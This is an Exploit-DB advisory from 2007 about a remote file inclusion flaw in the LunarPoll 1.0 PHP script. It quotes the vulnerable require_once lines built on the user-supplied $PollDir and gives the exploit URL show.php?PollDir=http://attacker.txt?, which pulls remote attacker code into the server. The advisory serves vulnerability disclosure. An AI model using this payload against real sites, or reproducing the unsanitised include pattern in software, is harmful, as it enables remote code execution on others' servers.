LunarPoll 1.0 - 'show.php?PollDir' Remote File Inclusion

EDB-ID:

3117




Platform:

PHP

Date:

2007-01-12


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

-------------------------------------------------------------------------------------------------------------------

AYYILDIZ.ORG PreSents...


Script:LunarPoll
Script Download: dexxaboy.com/scripts/lunarpoll/download/

Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

Code:
require_once($PollDir.'/includes/functions.php');
require_once($PollDir.'/includes/IO.php');

-------------------------------------------------------------------------------------------------------------------

Exploit:  show.php?PollDir=http://attacker.txt?

-------------------------------------------------------------------------------------------------------------------

Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR
Special Tnx: AYYILDIZ.ORG

# milw0rm.com [2007-01-12]